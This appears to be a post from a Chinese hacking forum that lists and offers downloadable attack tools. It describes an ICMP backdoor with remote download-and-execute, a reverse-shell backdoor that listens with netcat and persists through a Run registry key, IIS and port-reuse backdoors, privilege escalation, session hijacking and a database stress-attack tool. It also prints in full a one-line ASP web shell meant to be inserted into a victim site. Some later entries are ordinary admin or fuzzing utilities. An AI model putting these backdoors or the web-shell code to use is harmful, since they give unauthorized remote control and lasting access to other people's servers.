信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

注意：本帖只上传后门 键盘记录 远程连接 和 攻击工具以及辅助工具工具

目前Upload的权限限制严格 所以请不要灌水就好了：）
工具要小而毒！

比起ncx.exe及ncx99.exe 这玩意有趣多了 Post by swords

本后门利用ICMP数据包进行通信，不开端口。安装成系统服务，开机自动运行。可以穿透一些防火墙。
icmpsrv.exe ：服务端程序，使用 -install（-remove御载）参数安装成服务。
icmpsend.exe ：客户端程序。使用icmpsend IP进行控制。
ICMP_Backdoor命令说明：
[http://xxx.xxx.xxx/admin.exe -hacker.exe]
http下载文件，保存在目标主机\\system32\目录下，文件名为hacker.exe（可改）。参数hacker.exe，前面的“-”不能省去
[pslist] 列出远程主机的进程名称和pid
[pskill id] 杀进程号为id的进程
输入普通cmd命令，则远程主机执行相关命令。

binder2.exe 反弹式后门程序
在WEB的渗透测试中,我们经常会遇到主机端口被过滤的情况,虽然成功创建后门,但是连接不上,这时,这个反弹式后门也许能起上点作用.
用法:
1. 在本地机器监听一个端口:
netcat -vv -l -p 80
2. 通过webShell或是别的什么运行后门:
binder2 80 youIPadd
3. 本地监听端口将截获一个来自远程主机的cmd.
注意:
程序本身会创建一个自启动方法, 如果没有参数的命令,会连接默认IP和默认端口,这个exe默认的IP地址是内网地址10.24.9.100,端口7358.程序会复制自身到c:\winnt\下名为syslog.exe,并在HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run 下创建启动键. 如果需要卸载,请使用 binder2 /kill 命令.(如果因权限问题,这些将不能执行,比如在wenshell中执行时.)
压缩包中含源码,建议按需更改代码后使用

IIS后门 使用方法：将本软件放在服务器上运行即可安装后门，通过IIS端口（一般是80）连接，可以穿透防火墙。

一个简单的命令行中的FTP服务程序，具有一般的FTP服务的功能，支持Pasv，Port两种模式，支持fxp,支持上传，下载，删除，建目录，远程执行等操作。最多允许128个连接，每个IP最多可以同时登陆三次，在180秒到210内都没有操作的话，会自动将连接用户断开。程序是支持断点再传的。

功能可以对开着web服务的防火墙机器。利用http端口重用技术，穿透防火墙，用法,在目标机器安装后，telnet ip 80端口就ok

asp.net web后门代码（web shell）
前提是服务器上已经装了.net framework了。

在NT和2000下将任意用户提升到SYSTEM级别的权限的工具，具体用法以及源代码见压缩包内。

在知道SQL的用户名密码情况下执行命令的程序，用VC6写成，包括源代码

交换环境下的会话劫持(For windows2000)工具
windows2000 + winpcap2.3下运行。

数据库压力攻击工具 BST的FatBoy

远程信息刺探snmp 用法参照
http://eviloctal.hackway.net/forum/read.php?tid=403
可以获得好多东西的 前提是有安全问题

IndexView 用来查看 index.dat的小东西...

WebShell客户端（服务端仅一行代码）
作者：桂林老兵
只要在网站中的一个ASP文件中合乎语法要求的地方插上下面一段（分一行写入）

复制内容到剪贴板

代码:

<%If request("cmd")<>"" And request("path")<>"" then createobject("Scri"&"pting.FileSys"&"temObject").createTextFile(server.mappath(request("path"))).WriteLine request("cmd")%>

即可用本程序写任何脚本存到网站的任意可写目录。

下载地址：http://www.gxgl.com/soft/ShellClient.exe

软件介绍            

作   者：tankaiha[NE365]

日   期：2004-11-18

程序名称：特征码定位器CCL(Character Code Locator)

版   本：2.0.1

功   能：寻找出防病毒软件报警的PE文件(病毒、木马等)中恶意代码的位置

编译环境：WindowsXP+SP1，MASM32，RadASM2.1.0.1

运行环境：WindowsXP，Windows2000

软件性质：免费软件

Uptime 是一个适用于Windows NT系列操作系统（NT4/2K/XP/2003等）的命令行工具，它可以查看本地或者远程计算机（也必须是NT系列）的系统启动时间。这个工具没有49.7天的限制，也不依赖于系统日志。当然，如果想获取远程系统的启动时间，你需要那个系统的管理员密码。
提示：对于Windows XP/2003，如果远程系统的管理员口令为空，那么该系统无法获得其启动时间。这个不是本软件的BUG，而是Windows XP/2003的安全策略所导致的。

l0pht大哥的补充：

引用:

我只要用dos内部命令就可以了实现了 dir /T:A explorer.exe
你这里还有一些靠系统命令和功能就可以实现了，不用工具的话尽量不要用。

PowerDown 是一个运行于Windows NT/2K/XP/2003的命令行的工具（不支持win9x），用于注销/关机/重启/挂起/冬眠你的操作系统。执行之前它会请求你的确认，除非你使用 "-y" 的命令行参数以避免确认。

SiteDigger searches Google’s cache to look for vulnerabilities, errors, configuration issues, proprietary information, and interesting security nuggets on web sites.

Efuzz is an easy to use fuzzer (Penetrationtesting tool) to search for unknown vulnerabillities in software (buffer overflows,format string vulns, integer overflows, command line overflows, ...).I code it, because I do not find an easy to use fuzzer application and I need a simple tool for vuln-research. I think spike is to complex to use for first stage penetration testing, but a very useful tool to find more complex vulns.
详细请看readme：）

Blast is a small, quick TCP service stress test tool that does a large amount of work very quickly and can help spot potential weaknesses in your network servers.

焦点上看见的一个小东西 意思自然就是process list了

这是一个在获得管理员权限的帐号和密码的情况下，利用主机的Task Scheduler服务在主机上启动程序的小程序。
它的功能和流光种植者一样,只是我单独把它写出来了。如果你想在远程主机上启动程序，而又不想用流光，那么
你不妨试试这个小程序：）
SchedExec